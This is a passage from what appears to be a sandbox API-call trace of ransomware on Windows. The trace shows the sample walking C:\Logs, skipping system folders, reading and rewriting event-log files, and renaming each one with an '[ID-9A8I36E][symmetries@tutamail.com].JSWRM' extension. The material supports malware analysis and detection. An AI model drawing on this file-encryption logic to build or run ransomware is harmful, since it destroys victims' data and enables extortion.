Service%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0066.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0066.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0066.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0066.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0066.470] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2=".") returned 1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="..") returned 1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="...") returned 1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="windows") returned -1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="recovery") returned -1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="perflogs") returned -1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="documents and settings") returned 1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="system volume information") returned -1 [0066.470] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpString2="msocache") returned -1 [0066.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0066.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0066.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchWideChar=44, lpMultiByteStr=0x1f8328, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 44 [0066.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0066.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0066.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0066.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchWideChar=44, lpMultiByteStr=0x1f84e8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-UserPnp%4ActionCenter.evtx", lpUsedDefaultChar=0x0) returned 44 [0066.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0066.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0066.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0066.471] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.471] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.471] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.471] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.477] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.477] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.477] CloseHandle (hObject=0x450) returned 1 [0066.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0066.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0066.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0066.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0066.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0066.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0066.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.479] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.480] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2=".") returned 1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="..") returned 1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="...") returned 1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="windows") returned -1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="recovery") returned -1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="perflogs") returned -1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="documents and settings") returned 1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="system volume information") returned -1 [0066.480] lstrcmpiW (lpString1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpString2="msocache") returned -1 [0066.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0066.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0066.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchWideChar=45, lpMultiByteStr=0x1f8638, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpUsedDefaultChar=0x0) returned 45 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0066.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0066.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0066.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchWideChar=45, lpMultiByteStr=0x1f8670, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpUsedDefaultChar=0x0) returned 45 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0066.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0066.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0066.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0066.481] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.481] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.481] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.481] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.486] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.486] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.486] CloseHandle (hObject=0x450) returned 1 [0066.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0066.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0066.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0066.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0066.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0066.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.489] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.489] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0066.489] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2=".") returned 1 [0066.489] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="..") returned 1 [0066.489] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="...") returned 1 [0066.489] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="windows") returned -1 [0066.489] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="recovery") returned -1 [0066.489] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="perflogs") returned -1 [0066.490] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.490] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.490] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="system volume information") returned -1 [0066.490] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="msocache") returned -1 [0066.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0066.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0066.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0066.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchWideChar=57, lpMultiByteStr=0x20de78, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0066.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0066.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0066.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0066.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0066.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchWideChar=57, lpMultiByteStr=0x20e418, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0066.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0066.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0066.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0066.490] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.491] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.491] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.491] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.498] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.498] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.498] CloseHandle (hObject=0x450) returned 1 [0066.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0066.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.501] MultiByteToWideChar (in: CodePage=0x0, 